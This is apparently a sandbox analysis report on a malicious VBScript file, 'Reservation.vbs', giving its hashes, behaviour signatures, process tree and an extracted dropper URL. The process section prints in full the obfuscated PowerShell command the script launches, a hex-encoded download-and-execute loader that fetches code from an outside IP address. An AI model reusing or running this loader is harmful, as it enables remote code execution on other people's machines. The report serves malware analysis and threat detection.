Analysis
-
max time kernel
137s -
max time network
139s -
platform
windows7_x64 -
resource
win7-en -
submitted
05-09-2021 21:15
Static task
static1
Behavioral task
behavioral1
Sample
Reservation.vbs
Resource
win7-en
windows7_x64
0 signatures
0 seconds
General
-
Target
Reservation.vbs
-
Size
1KB
-
MD5
d1105a626de00b3a3d248febfe9d2eab
-
SHA1
f088bdfa3f5d251f325ff4b11b5e680425c25ba2
-
SHA256
c61844d30e92c490359ae221d04620767e303247345e12de34f8ae43eb1cf26b
-
SHA512
11378362541f0656af2bc775cfd4b8e23e9c9a08cd9eb8b35109f3553da2e870a9c376efd3df2039c4c8224c70ba54ff0cad0030751bdfb8641da4f639e0bc16
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://54.184.87.30/bypass.txt
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1736 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1736 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WScript.exedescription pid process target process PID 2040 wrote to memory of 1736 2040 WScript.exe powershell.exe PID 2040 wrote to memory of 1736 2040 WScript.exe powershell.exe PID 2040 wrote to memory of 1736 2040 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Reservation.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='http://54XXX184XXX87XXX30/bypassXXXtxt'.Replace('XXX','.');$Shib='24=42=20=3d=27=45=54=48=20=43=4f=49=4e=74=2e=57=54=46=20=43=4f=49=4e=6c=49=4f=53=4e=54=27=2e=52=65=70=6c=61=63=65=28=27=45=54=48=20=43=4f=49=4e=27=2c=27=6e=45=27=29=2e=52=65=70=6c=61=63=65=28=27=54=46=20=43=4f=49=4e=27=2c=27=45=62=43=27=29=2e=52=65=70=6c=61=63=65=28=27=4f=53=27=2c=27=65=27=29=3b=24=43=43=20=3d=20=27=44=4f=53=20=43=4f=49=4e=20=4c=53=4f=53=43=4f=49=4e=6e=47=27=2e=52=65=70=6c=61=63=65=28=27=53=20=43=4f=49=4e=20=27=2c=27=57=6e=27=29=2e=52=65=70=6c=61=63=65=28=27=53=4f=27=2c=27=6f=61=44=27=29=2e=52=65=70=6c=61=63=65=28=27=43=4f=49=4e=27=2c=27=54=72=49=27=29=3b=24=41=20=3d=27=49=60=45=6f=73=20=43=4f=49=4e=60=57=60=42=54=43=20=43=4f=49=4e=6a=60=45=54=48=20=43=4f=49=4e=20=24=42=29=2e=24=43=43=28=24=54=52=55=4d=50=29=27=2e=52=65=70=6c=61=63=65=28=27=6f=73=20=43=4f=49=4e=27=2c=27=58=28=6e=60=65=27=29=2e=52=65=70=6c=61=63=65=28=27=42=54=43=20=43=4f=49=4e=27=2c=27=2d=4f=62=27=29=2e=52=65=70=6c=61=63=65=28=27=54=48=20=43=4f=49=4e=27=2c=27=60=63=60=54=27=29=3b=26=28=27=49=27=2b=27=45=58=27=29=28=24=41=20=2d=4a=6f=69=6e=20=27=27=29=7c=26=28=27=49=27=2b=27=45=58=27=29=3b';Invoke-Expression (-join ($Shib -split '=' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1736-54-0x0000000000000000-mapping.dmp
-
memory/1736-56-0x000007FEF2940000-0x000007FEF349D000-memory.dmpFilesize
11.4MB
-
memory/1736-58-0x0000000002810000-0x0000000002812000-memory.dmpFilesize
8KB
-
memory/1736-59-0x0000000002812000-0x0000000002814000-memory.dmpFilesize
8KB
-
memory/1736-60-0x0000000002814000-0x0000000002817000-memory.dmpFilesize
12KB
-
memory/1736-57-0x000000001B760000-0x000000001BA5F000-memory.dmpFilesize
3.0MB
-
memory/1736-61-0x000000000281B000-0x000000000283A000-memory.dmpFilesize
124KB
-
memory/2040-53-0x000007FEFB651000-0x000007FEFB653000-memory.dmpFilesize
8KB